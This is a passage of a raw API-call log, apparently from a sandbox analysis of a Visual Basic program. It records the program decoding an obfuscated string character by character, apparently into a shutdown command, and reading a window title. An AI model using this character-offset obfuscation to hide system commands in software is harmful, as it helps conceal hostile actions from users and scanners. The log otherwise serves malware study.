pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0173.547] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.548] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.548] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.549] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0173.549] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.549] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.550] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0173.562] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.562] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.563] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.563] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0173.564] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.564] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.575] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.575] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0173.576] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.576] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0173.577] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.578] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.578] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.578] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.579] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.579] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.580] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0173.580] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.581] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.591] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.592] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.592] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.593] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0173.593] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.594] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.594] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.595] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0173.595] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.596] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.596] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.596] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.731] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0173.732] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.732] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.732] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.733] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0173.733] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.733] GetForegroundWindow () returned 0x10278 [0173.733] GetLastError () returned 0x0 [0173.733] SysStringLen (param_1=" ") returned 0xff [0173.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0173.733] SysStringLen (param_1=" ") returned 0xff [0173.733] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0173.733] GetWindowTextA (in: hWnd=0x10278, lpString=0x11644c4, nMaxCount=255 | out: lpString="Goal Join") returned 9 [0173.733] GetLastError () returned 0x0 [0173.734] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0173.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0173.734] SysStringByteLen (bstr="潇污䨠楯n†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0173.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Goal Join") returned 256 [0173.734] SysStringLen (param_1="Goal Join") returned 0xa [0173.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Goal Join", cchWideChar=11, lpMultiByteStr=0x11684fc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Goal Join", lpUsedDefaultChar=0x0) returned 11 [0173.734] SetWindowTextA (hWnd=0x103c4, lpString="Goal Join") returned 1 [0173.734] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0173.734] GetFocus () returned 0x0 [0173.734] lstrlenA (lpString="Goal Join") returned 9 [0173.734] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0173.735] IsWindow (hWnd=0x103c4) returned 1 [0173.735] IsWindow (hWnd=0x103c4) returned 1 [0173.735] IsWindow (hWnd=0x103c4) returned 1 [0173.735] IsWindow (hWnd=0x103c4) returned 1 [0173.735] GetFocus () returned 0x0 [0173.735] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x9 [0173.736] GetFocus () returned 0x0 [0173.736] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xa) returned 0x10e1d20 [0173.736] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0xa, lParam=0x10e1d20) returned 0x9 [0173.736] GetFocus () returned 0x0 [0173.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0173.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Goal Join", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=10 | out: lpWideCharStr="Goal Join") returned 10 [0173.736] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0173.736] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0173.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.737] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0173.737] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.740] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.740] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0173.740] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.741] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0173.741] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.741] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.741] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0173.741] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.742] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0173.742] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.742] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.743] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0173.743] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.743] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0173.743] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.744] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0173.744] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.744] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.744] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0173.745] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.745] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0173.745] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0173.746] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.746] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0173.746] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0173.746] 